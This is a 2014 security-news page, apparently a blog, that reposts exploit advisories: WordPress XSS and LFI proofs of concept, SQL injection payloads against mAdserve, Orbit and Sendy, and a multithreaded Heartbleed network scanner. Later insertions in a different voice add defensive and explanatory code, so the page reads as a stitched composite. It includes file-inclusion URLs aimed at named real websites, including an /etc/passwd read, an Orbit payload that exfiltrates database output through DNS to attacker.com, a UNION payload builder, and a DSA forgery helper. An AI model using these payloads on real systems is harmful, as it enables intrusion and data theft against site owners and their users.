MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

23 Apr 2014

WordPress Quick Page/Post Redirect Plugin 5.0.3 CSRF / XSS

Details
================
Software: Quick Page/Post Redirect Plugin
Version: 5.0.3
Homepage: http://wordpress.org/plugins/quick-pagepost-redirect-plugin/
Advisory ID: dxw-1970-1091
CVE: CVE-2014-2598
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
 
Description
================
CSRF and stored XSS in Quick Page/Post Redirect Plugin
 
Vulnerability
================
This plugin is vulnerable to a combined CSRF/XSS attack: if an admin user can be persuaded to visit a URL of the attacker's choosing (via spear phishing, for instance), the attacker can insert arbitrary JavaScript into an admin page. Once that occurs, the admin's browser can be made to do almost anything the admin user could normally do, such as create or delete posts, create new admin users, or even exploit vulnerabilities in other plugins.
 
Proof of concept
================
Use the following form to introduce potentially malicious JavaScript:
<form method="POST" action="http://localhost/wp-admin/admin.php?page=redirect-updates">
  <input type="text" name="quickppr_redirects[request][]" value='"><script>alert(1)</script>'>
  <input type="text" name="quickppr_redirects[destination][]" value="http://dxw.com/">
  <input type="text" name="submit_301" value="1">
  <input type="submit">
</form>
 
Mitigations
================
Upgrade to version 5.0.5 or later.
 
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
 
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
 
This vulnerability will be published if we do not receive a response to this report within 14 days.
 
Timeline
================
 
2014-03-21: Discovered
2014-03-24: Reported to plugins@wordpress.org
2014-04-07: No response; requested an alternative email address using the author’s contact form.
2014-04-08: Re-reported direct to author
2014-04-08: Author responded, and publication agreed on or before 2014-05-06
2014-04-10: Author reports issue fixed in version 5.0.5
 
 
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.


23 Apr 2014

WordPress LineNity Local File Inclusion

[+] Local File Inclusion in WordPress Theme LineNity  
[+] Date: 13/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: download.php
[+] Exploit : http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ] 
[+] PoC: http://www.mom-o-tron.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php
         http://sport.ut.ee/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../../etc/passwd
         http://SITE/wp-content/themes/linenity/functions/download.php?imgurl=download.php
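The three PoC URLs above all rely on the same defect: the `imgurl` parameter is joined onto a base path with no canonicalisation, so `../` sequences walk out of the theme directory and `download.php` can even include itself. The following is an added example (not LineNity's code, and not from the advisory) of the check a practitioner would put in front of such a file read. The theme root path and the extension whitelist are assumptions for the demonstration; the canonicalisation is pure string handling so it runs without a filesystem.

```python
import posixpath

# Hypothetical theme root and whitelist: assumptions for this example, not LineNity's code.
THEME_ROOT = "/var/www/html/wp-content/themes/linenity"
ALLOWED_EXTENSIONS = (".png", ".jpg", ".jpeg", ".gif")


def vulnerable_target(imgurl):
    """The pattern the PoC URLs exploit: the parameter is appended to a base
    path untouched, so '../' sequences walk out of the theme directory."""
    return THEME_ROOT + "/" + imgurl


def resolve_under_root(root, user_path, allowed_extensions=ALLOWED_EXTENSIONS):
    """Return the canonical path if it stays inside `root` and has an allowed
    extension, otherwise None.

    This is pure string canonicalisation (posixpath.normpath). On a real
    filesystem, also run os.path.realpath on both sides so that a symlink
    inside root cannot point outside it."""
    if not user_path or "\x00" in user_path:
        return None
    if posixpath.isabs(user_path):
        # posixpath.join(root, "/etc/passwd") would discard root entirely.
        return None
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, user_path))
    if not candidate.startswith(root_norm + "/"):
        return None                       # '..' components walked above the root
    if not candidate.lower().endswith(allowed_extensions):
        return None                       # blocks download.php including itself, .php sources, /etc/passwd
    return candidate
```

The extension check is what stops the third PoC (`imgurl=download.php`): the path is inside the theme directory, so a traversal check alone would let it through.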


16 Apr 2014

mAdserve SQL Injection

Advisory Details:
 
High-Tech Bridge Security Research Lab discovered multiple SQL injection vulnerabilities in mAdserve, which can be 
exploited to execute arbitrary SQL commands in the application's database and compromise the vulnerable website.
 
 
1) SQL Injection in mAdserve: CVE-2014-2654
 
1.1 The vulnerability exists due to insufficient sanitisation of user input passed via the "id" HTTP GET parameter to 
the "/www/cp/edit_ad_unit.php" script. A remote authenticated attacker can inject and execute arbitrary SQL commands in 
the application's database and gain complete control over the application.  
 
The exploitation example below displays version of MySQL server:
 
http://[host]/www/cp/edit_ad_unit.php?id=1%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,version%28%29,13,14,15,16,17%20--%202
 
 
1.2 Input passed via the "id" HTTP GET parameter to the "/www/cp/view_adunits.php" script is not properly sanitised before 
being used in a SQL query. A remote authenticated attacker can inject and execute arbitrary SQL commands in the 
application's database and gain complete control over the application. 
 
The exploitation example below displays version of MySQL server:
 
http://[host]/www/cp/view_adunits.php?id=1%27%20UNION%20SELECT%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20--%202
 
 
1.3 Input passed via the "id" HTTP GET parameter to the "/www/cp/edit_campaign.php" script is not properly sanitised before 
being used in a SQL query. A remote authenticated attacker can inject and execute arbitrary SQL commands in the 
application's database and gain complete control over the application.
 
The exploitation example below displays version of MySQL server:
 
http://[host]/www/cp/edit_campaign.php?id=1%27%20UNION%20SELECT%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20--%202
 
 
Successful exploitation of these vulnerabilities requires the attacker to have an account and to be logged in. User 
accounts are manually created by mAdserve administrator. 
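All three mAdserve payloads above have the same shape: close the quoted literal, `UNION SELECT` a row of the right width with `version()` in the column the page echoes, then comment out the trailing quote. The block below is an added example, not mAdserve's code or High-Tech Bridge's: it reproduces the vulnerable string-concatenation pattern against a constructed in-memory sqlite table (so it runs offline, with `sqlite_version()` standing in for MySQL's `version()`), builds the payload generically for N columns, and shows the bound-parameter query that makes the same input inert. The table and column names are assumptions.

```python
import sqlite3


def make_demo_db():
    """Constructed stand-in for an ad-unit table; sqlite in memory so this runs offline."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE ad_units (id INTEGER, name TEXT, publisher TEXT)")
    con.executemany("INSERT INTO ad_units VALUES (?, ?, ?)",
                    [(1, "banner-top", "acme"), (2, "interstitial", "globex")])
    return con


def fetch_ad_unit_vulnerable(con, ad_id):
    """The defect the advisory describes: the id parameter is pasted into the
    quoted literal unescaped, so a quote in it ends the literal."""
    sql = "SELECT id, name, publisher FROM ad_units WHERE id = '%s'" % ad_id
    return con.execute(sql).fetchall()


def fetch_ad_unit_fixed(con, ad_id):
    """Bound parameter: the value travels separately from the SQL text, so
    quotes, UNION and comments inside it are just data to compare against."""
    return con.execute("SELECT id, name, publisher FROM ad_units WHERE id = ?",
                       (ad_id,)).fetchall()


def union_payload(columns, position, expression, base_id="1"):
    """Build the advisory's payload shape for a query returning `columns`
    columns, placing `expression` in column `position` (1-based).

    The advisory ends with '-- 2': MySQL needs whitespace after '--', and the
    trailing token keeps that space from being trimmed when URL-encoded.
    sqlite accepts '-- ' with nothing after it."""
    cols = [str(i) for i in range(1, columns + 1)]
    cols[position - 1] = expression
    return "%s' UNION SELECT %s -- " % (base_id, ",".join(cols))


def injected_values(rows, position, columns):
    """Pick the injected column out of the extra rows the UNION appended."""
    return [row[position - 1] for row in rows if len(row) == columns
            and all(row[i] == i + 1 for i in range(columns) if i != position - 1)]
```

Against a real target the column count is found first (the advisory's 17 and 26 placeholders are that count for each script), then `version()` is moved from column to column until it appears in the page; `union_payload(17, 12, "version()")` reproduces the first PoC exactly.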
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Vendor did not reply to 3 notifications by email, 3 notifications via contact form, 1 notification via twitter. 
Currently we are not aware of any official solution for this vulnerability.
 
An unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: 
https://www.htbridge.com/advisory/HTB23209-patch.zip
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23209 - https://www.htbridge.com/advisory/HTB23209 - SQL Injection in mAdserve.
[2] mAdserve - http://www.madserve.org/ - The Open Source Mobile Ad Server for Publishers.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment 
solution with SaaS delivery model that combines manual and automated vulnerability testing.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.


15 Apr 2014

Should openssl accept weak DSA/DH keys with g = +/- 1 ?

openssl accepts DSA (and probably DH) keys with
g=1 (or g= -1). Both are extremely weak, in
practice plaintext.
 
g=1 works all the time
g= -1 works about half the time in DSA
(on vanilla openssl).
 
Is there a MITM implication in this,
e.g. can a MITM convince both parties
that g=1 -- in this case the private keys
won't matter in DH.
 
Attached are certs.
$ openssl x509 -text -in certg=1.pem
G:    1 (0x1)
 
#server
$openssl s_server -accept 8888 -cert ./certg=1.pem -key certg=1.key -CAfile ./cacert.pem -www
 
#client
$ openssl s_client -connect localhost:8888 -showcerts -CAfile cacert.pem
Verify return code: 0 (ok)
 
-- 
blog:  https://j.ludost.net/blog
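The post above reports the observation but not the arithmetic behind it. The following added example (not from the post's author, and not OpenSSL code) implements textbook DSA over toy parameters constructed for the demonstration (p = 23, q = 11; a real key uses a 2048-bit p) and shows why g = 1 is "in practice plaintext": with g = 1 the public key y = g^x is 1 regardless of x, r = (g^k mod p) mod q is 1 for every nonce, and the verifier's v = g^u1 y^u2 mod p mod q is 1 for every message, so the pair (1, s) verifies with no private key at all. It also includes the parameter check that rejects g = 1 and g = p-1 (the "-1" case in the post, whose order is 2 rather than q). `pow(k, -1, q)` needs Python 3.8 or later.

```python
import hashlib
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class DsaParams:
    p: int   # prime modulus
    q: int   # prime order of the subgroup, q | p - 1
    g: int   # generator of that subgroup


# Toy parameters constructed for this example (real DSA uses a 2048/3072-bit p):
# q = 11 divides p - 1 = 22, and g = 2^((p-1)/q) mod p = 4 has order exactly 11.
HONEST = DsaParams(p=23, q=11, g=4)
# Same p and q but g = 1: the degenerate generator the post says OpenSSL accepts.
WEAK_G1 = DsaParams(p=23, q=11, g=1)


def params_sane(params):
    """Reject degenerate generators: g must lie strictly between 1 and p-1 and
    have order q. g = 1 (order 1) and g = p-1 (order 2) both fail here."""
    p, q, g = params.p, params.q, params.g
    return 1 < g < p - 1 and pow(g, q, p) == 1


def hash_to_int(msg, q):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % q


def public_key(params, x):
    return pow(params.g, x, params.p)


def sign(params, x, msg):
    p, q, g = params.p, params.q, params.g
    h = hash_to_int(msg, q)
    while True:
        k = secrets.randbelow(q - 1) + 1          # per-signature nonce in [1, q-1]
        r = pow(g, k, p) % q
        if r == 0:
            continue
        s = (pow(k, -1, q) * (h + x * r)) % q
        if s != 0:
            return r, s


def verify(params, y, msg, sig):
    p, q, g = params.p, params.q, params.g
    r, s = sig
    if not (0 < r < q and 0 < s < q):
        return False
    w = pow(s, -1, q)
    h = hash_to_int(msg, q)
    u1 = (h * w) % q
    u2 = (r * w) % q
    v = (pow(g, u1, p) * pow(y, u2, p) % p) % q
    return v == r


def forge_without_key(params, msg):
    """With g = 1 every y is 1 and g^u1 * y^u2 is 1, so v == 1 for any message
    and any s in [1, q-1]. (1, 1) therefore verifies without knowing x."""
    assert params.g == 1
    return 1, 1
```

The same check applies to DH: a peer that accepts g = 1 computes a shared secret of 1 whatever its private exponent, which is the MITM concern the post raises.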


14 Apr 2014

heartbleed-masstest POC

#!/usr/bin/env python
 
# Based on the original code by Jared Stafford.
 
# NOTE: this code has been modified to test for OpenSSL versions vulnerable to 
# Heartbleed without exploiting the server, therefore the heartbeat request
# does _not_ cause the server to leak any data from memory or expose any data
# in an unauthorized manner.
# Based on: https://github.com/dchan/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
# See: https://blog.mozilla.org/security/2014/04/12/testing-for-heartbleed-vulnerability-without-exploiting-the-server/
 
# Usage example: python ssltest.py example.com
 
import sys
import struct
import socket
import time
import select
import re
import threading
import netaddr
import json
import os
import datetime
import signal
from optparse import OptionParser
from collections import defaultdict
from multiprocessing.dummy import Pool
 
host_status = {}
hosts_to_skip = []
counter = defaultdict(int)
lock = threading.Lock()
 
options = OptionParser(usage='%prog <network> [network2] [network3] ...', description='Test for SSL heartbleed vulnerability (CVE-2014-0160) on multiple domains')
options.add_option('--input', '-i', dest="input_file", default=[], action="append", help="Optional input file of networks or ip addresses, one address per line")
options.add_option('--logfile', '-o', dest="log_file", default="results.txt", help="Optional logfile destination")
options.add_option('--resume', dest="resume", action="store_true", default=False, help="Do not rescan hosts that are already in the logfile")
options.add_option('--timeout', '-t', dest="timeout", default=5, help="How long to wait for remote host to respond before timing out")
options.add_option('--threads', dest="threads", default=100, help="If specified, run X concurrent threads")
options.add_option('--json', dest="json_file", default=None, help="Save data as json into this file")
options.add_option('--only-vulnerable', dest="only_vulnerable", action="store_true", default=False, help="Only scan hosts that have been scanned before and were vulnerable")
options.add_option('--only-unscanned', dest="only_unscanned", action="store_true", default=False, help="Only scan hosts that appear in the json file but have not been scanned")
options.add_option('--summary', dest="summary", action="store_true", default=False, help="Useful with --json. Don't scan, just print old results")
options.add_option('--verbose', dest="verbose", action="store_true", default=False, help="Print verbose information to screen")
options.add_option('--max', dest="max", default=None, help="Exit program after scanning X hosts. Useful with --only-unscanned")
opts, args = options.parse_args()
 
threadpool = Pool(processes=int(opts.threads))
 
 
def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')
 
hello = h2bin('''
16 03 03 00  dc 01 00 00 d8 03 03 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')
 
def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        # Wait no longer than the time left in the overall deadline.
        r, w, e = select.select([s], [], [], rtime)
        if s in r:
            try:
                data = s.recv(remain)
            except Exception, e:
                return None
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
 
 
def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        return None, None, None
    return typ, ver, pay
 
 
def hit_hb(s):
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            return False
 
        if typ == 24:
            return True
 
        if typ == 21:
            return False
 
 
def is_vulnerable(host, timeout):
    """ Check if remote host is vulnerable to heartbleed
 
     Returns:
        None  -- If remote host has no ssl
        False -- Remote host has ssl but likely not vulnerable
        True  -- Remote host might be vulnerable
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(int(timeout))
    try:
        s.connect((host, 443))
    except Exception, e:
        return None
    s.send(hello)
 
    hbpkt = h2bin("01 4e 20") + "\x01"*20000
    hb = h2bin("18 03 03 40 00") + hbpkt[0:16384] + \
            h2bin("18 03 03 0e 23") + hbpkt[16384:]
 
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            return None
 
        # copy ssl version from server to heartbeat request packet
        hb=hb[:2] + chr(ver&0xff) + hb[3:]
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break
 
    s.send(hb)
    return hit_hb(s)
 
 
def store_results(host_name, current_status):
    current_time = time.time()
    with lock:
        counter[current_status] += 1
        counter["Total"] += 1
        if host_name not in host_status:
            host_status[host_name] = {}
        host = host_status[host_name]
        # Make a note when this host was last scanned
        host['last_scan'] = current_time
 
        # Make a note if this host has never been scanned before
        if 'first_scan' not in host:
            host['first_scan'] = current_time
        elif host.get('status', 'never been scanned') != current_status:
            # If it has a different check result from before
            host['changelog'] = host.get('changelog', [])
            changelog_entry = [current_time, current_status]
            host['changelog'].append(changelog_entry)
        host['status'] = current_status
        with open(opts.log_file, 'a') as f:
            message = "{current_time} {host} {current_status}".format(**locals())
            f.write(message + "\n")
            return message
 
 
def scan_host(host):
    """ Scans a single host, logs into
 
    Returns:
        list(timestamp, ipaddress, vulnerabilitystatus)
    """
    # Stop once --max hosts have been scanned (the original compared the other way round
    # and skipped every host until the total exceeded the maximum).
    if opts.max and counter["Total"] >= int(opts.max):
        return
    host = str(host)
    if host in hosts_to_skip:
        return
    result = is_vulnerable(host, opts.timeout)
    message = store_results(host, result)
    if opts.verbose:
        print message
    return message
 
 
def scan_hostlist(hostlist, threads=5):
    """ Iterates through hostlist and scans them
 
    Arguments:
        hostlist    -- Iterable with ip addresses
        threads     -- If specified, run in multithreading mode
    """
    task = threadpool.map_async(scan_host, hostlist)
    while True:
        print counter['Total'], "hosts done"
        task.wait(1)
        if task.ready() or hasattr(threadpool, 'done'):
            break
    # The pool is shared by every network given on the command line, so it is not
    # closed or joined here; it is reclaimed when the process exits.
 
 
def clean_hostlist(args):
    """ Returns list of iterables
    Examples:
    >>> hostlist = ["127.0.0.1", "127.0.0.2"]
    >>> clean_hostlist(hostlist)
    """
    hosts = []
    networks = []
    for i in args:
        # If it contains any alphanumerics, it might be a domain name
        if any(c.isalpha() for c in i):
            # Special hack, because alexa top x list is kind of weird
            i = i.split('/')[0]
            hosts.append(i)
        # If arg contains a / we assume its a network name
        elif '/' in i:
            networks.append(netaddr.IPNetwork(i))
        else:
            hosts.append(i)
    result = []
    for i in networks:
        result.append(i)
    if hosts:
        result.append(hosts)
    return result
 
 
def import_json(filename):
    """ Reads heartbleed data in json format from this file """
    with open(filename) as f:
        json_data = f.read()
    data = json.loads(json_data)
    for k, v in data.items():
        host_status[k] = v
 
 
def export_json(filename):
    """ Save scan results into filename as json data
    """
    json_data = json.dumps(host_status, indent=4)
    with open(filename, 'w') as f:
        f.write(json_data)
 
 
def print_summary():
    """ Print summary of previously stored json data to screen """
    if not opts.json_file:
        pass
        #options.error("You need to provide --json with --summary")
    else:
        import_json(opts.json_file)
    counter = defaultdict(int)
    for host, data in host_status.items():
        friendly_status = "unknown"
        status = data.get('status', "Not scanned")
        if status is None:
            friendly_status = "SSL Connection Failed"
        elif status is True:
            friendly_status = "Vulnerable"
        elif status is False:
            friendly_status = "Not Vulnerable"
        else:
            friendly_status = str(status)
        last_scan = int(float(data.get('last_scan',0)))
        last_scan = datetime.datetime.fromtimestamp(last_scan).strftime('%Y-%m-%d %H:%M:%S')
        counter[friendly_status] += 1
        counter['Total'] += 1
        if opts.only_vulnerable and not status:
            continue
        elif opts.only_unscanned and 'status' in data:
            continue
        print "%s %-20s %5s" % (last_scan, host, friendly_status)
    print "------------ summary -----------"
    for k,v in counter.items():
        print "%-7s %s" % (v, k)
    return
 
def signal_handler(signal, frame):
    print "Ctrl+C pressed.. aborting..."
    threadpool.terminate()
    threadpool.done = True
 
def main():
    if opts.summary:
        print_summary()
        return
 
    if not args and not opts.input_file and not opts.json_file:
        options.print_help()
        return
 
 
    # If any input files were provided, parse through them and add all addresses to "args"
    for input_file in opts.input_file:
        with open(input_file) as f:
            for line in f:
                words = line.split()
                if not words:
                    continue
                # If input file is in masscan's portscan format
                if line.startswith("Discovered open port"):
                    args.append(words.pop())
                elif len(words) == 1:
                    args.append(words[0])
                else:
                    print "Skipping invalid input line: " % line
                    continue
    if opts.json_file:
        try:
            import_json(opts.json_file)
        except IOError:
            print opts.json_file, "not found. Not importing any data"
 
 
        for host_name, data in host_status.items():
            if opts.only_unscanned and 'status' in data:
                continue
            if data.get('status', None) is True or not opts.only_vulnerable:
                args.append(host_name)
 
    # For every network in args, convert it to a netaddr network, so we can iterate through each host
    remote_networks = clean_hostlist(args)
    for network in remote_networks:
        scan_hostlist(network, threads=opts.threads)
 
    if opts.json_file:
        export_json(opts.json_file)
 
    print_summary()
 
if __name__ == '__main__':
    signal.signal(signal.SIGINT, signal_handler)
    main()
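The header of the script above says the heartbeat it sends is built so that the server does not leak memory, but it does not show what the server-side defect looks like. The following is an added example, written for this page rather than taken from the scanner or from OpenSSL: a small model of OpenSSL's heartbeat handling over the same TLS record and heartbeat framing the scanner uses (`struct` packing with `>BHH` and `>BH`), once trusting the attacker's 2-byte payload length as the unpatched code did, and once applying the 1.0.1g bounds check `1 + 2 + payload + 16 > record length`. The "memory" that follows the record in the server buffer is a constructed string.

```python
import struct

TLS_HEARTBEAT, TLS_ALERT = 24, 21
HB_REQUEST, HB_RESPONSE = 1, 2
PADDING_LEN = 16   # minimum padding required by RFC 6520


def tls_record(content_type, body, version=0x0303):
    """Wrap `body` in a TLS record header: type(1) version(2) length(2)."""
    return struct.pack(">BHH", content_type, version, len(body)) + body


def parse_record(data):
    """Split one record off the front of `data`: (type, version, body, rest)."""
    if len(data) < 5:
        raise ValueError("short record header")
    typ, ver, ln = struct.unpack(">BHH", data[:5])
    if len(data) < 5 + ln:
        raise ValueError("truncated record body")
    return typ, ver, data[5:5 + ln], data[5 + ln:]


def heartbeat_request(declared_len, payload):
    """Heartbeat message: type(1) payload_length(2) payload padding(16).
    A `declared_len` larger than len(payload) is the Heartbleed trigger."""
    return struct.pack(">BH", HB_REQUEST, declared_len) + payload + b"\x00" * PADDING_LEN


def server_heartbeat_handler(record_body, following_memory, patched):
    """Model of OpenSSL's tls1_process_heartbeat on one heartbeat record.

    `following_memory` is a constructed stand-in for whatever sits after the
    record in the server's buffer. Unpatched: copies payload_length bytes
    starting at the payload, trusting the client's length, so the copy runs
    on into `following_memory`. Patched (1.0.1g): silently discards the
    message unless 1 + 2 + payload_length + 16 fits inside the record, as
    RFC 6520 section 4 requires."""
    if len(record_body) < 3:
        return None
    if patched and 1 + 2 + PADDING_LEN > len(record_body):
        return None
    hb_type, payload_len = struct.unpack(">BH", record_body[:3])
    if hb_type != HB_REQUEST:
        return None
    if patched and 1 + 2 + payload_len + PADDING_LEN > len(record_body):
        return None                                   # discard, no alert is sent
    buffer_view = record_body + following_memory      # contiguous server memory
    echoed = buffer_view[3:3 + payload_len]           # memcpy(bp, pl, payload)
    return struct.pack(">BH", HB_RESPONSE, payload_len) + echoed + b"\x00" * PADDING_LEN


def leaked_bytes(response, sent_payload):
    """Bytes the server echoed that the client never sent: the over-read."""
    if response is None:
        return b""
    _, echoed_len = struct.unpack(">BH", response[:3])
    return response[3:3 + echoed_len][len(sent_payload):]


def scanner_verdict(server_reply):
    """The decision hit_hb() in the script makes on the first record that
    comes back: a heartbeat record (24) means the request was answered, an
    alert (21) or nothing at all means it was rejected."""
    if server_reply is None:
        return False
    return parse_record(server_reply)[0] == TLS_HEARTBEAT
```

Because a patched server discards the malformed heartbeat without replying, the scanner's "not vulnerable" result is really a timeout; that is why the script's `recvall` deadline matters and why a slow host can be misreported as patched.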


10 Apr 2014

Orbit Open Ad Server SQL Injection

Advisory Details:
 
High-Tech Bridge Security Research Lab discovered a vulnerability in Orbit Open Ad Server, which can be exploited to 
perform SQL injection attacks, alter SQL queries sent to the database of the vulnerable application and potentially gain 
control over the vulnerable website.
 
1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540
 
Input passed via the "site_directory_sort_field" HTTP POST parameter to "/guest/site_directory" URL is not properly 
sanitised before being used in SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL commands.
 
The PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application 
is hosted on a Windows system. The PoC makes the database server send a DNS request asking for the IP address of the 
`version()` (or any other sensitive database output) subdomain of ".attacker.com" (a domain name whose DNS server is 
controlled by the attacker):
 
 
<form action="http://[host]/guest/site_directory"; method="post" name="main">
<input type="hidden" name="active_form" value="site_directory_form">
<input type="hidden" name="ad_type_filter" value="text">
<input type="hidden" name="category_filter" value="1">
<input type="hidden" name="cost_model_filter" value="cpm">
<input type="hidden" name="form_mode" value="save">
<input type="hidden" name="image_size_filter" value="12">
<input type="hidden" name="keyword_filter" value="1">
<input type="hidden" name="site_directory_page" value="1">
<input type="hidden" name="site_directory_per_page" value="10">
<input type="hidden" name="site_directory_sort_direction" value="asc">
<input type="hidden" name="site_directory_sort_field" value="(select load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))">
<input type="submit" id="btn">
</form>
 
 
The second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) 
technique to extract data from the database:
 
 
<form action="http://[host]/guest/site_directory"; method="post" name="main">
<input type="hidden" name="active_form" value="site_directory_form">
<input type="hidden" name="ad_type_filter" value="text">
<input type="hidden" name="category_filter" value="1">
<input type="hidden" name="cost_model_filter" value="cpm">
<input type="hidden" name="form_mode" value="save">
<input type="hidden" name="image_size_filter" value="12">
<input type="hidden" name="keyword_filter" value="1">
<input type="hidden" name="site_directory_page" value="1">
<input type="hidden" name="site_directory_per_page" value="10">
<input type="hidden" name="site_directory_sort_direction" value="asc">
<input type="hidden" name="site_directory_sort_field" value="(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, 
BENCHMARK(22000000,MD5(NOW()))))">
<input type="submit" id="btn">
</form>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to Orbit Open Ad Server 1.1.1
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23208 - https://www.htbridge.com/advisory/HTB23208 - SQL Injection in Orbit Open Ad 
Server.
[2] Orbit Open Ad Server - http://orbitopenadserver.com/ - the free, open source ad tool that lets you manage the 
profits while we manage the technology.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment 
solution with SaaS delivery model that combines manual and automated vulnerability testing.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.


10 Apr 2014

Sendy 1.1.9.1 – SQL Injection Vulnerability

Sendy contains a flaw that may allow carrying out an SQL injection attack. The issue is due to the /send-to script not 
properly sanitizing user-supplied input to the "c" parameter. This may allow a remote attacker to inject or manipulate 
SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
 
Proofs:
 
# sqlmap -u 'http://server1/send-to?i=1&c=10' --cookie="version=1.1.9.1; PHPSESSID=[phpsessid value]; logged_in=[logged_in value]" -p c -D sendy --tables
 
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end 
user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not 
responsible for any misuse or damage caused by this program
 
[*] starting at 11:48:57
 
[11:48:57] [INFO] resuming back-end DBMS 'mysql'
[11:48:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: c
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: c=10 AND SLEEP(5)&i=1
---
 
[...]
 
Database: sendy
[9 tables]
+-------------+
| apps        |
| ares        |
| ares_emails |
| campaigns   |
| links       |
| lists       |
| login       |
| queue       |
| subscribers |
+-------------+


7 Apr 2014

MacOSX 10.9.2/XNU HFS Multiple Vulnerabilities

MacOSX/XNU HFS Multiple Vulnerabilities
Maksymilian Arciemowicz
http://cxsecurity.com/
http://cifrex.org/
 
===================
 
On November 8th I reported a vulnerability in HFS+ hard links
(CVE-2013-6799)

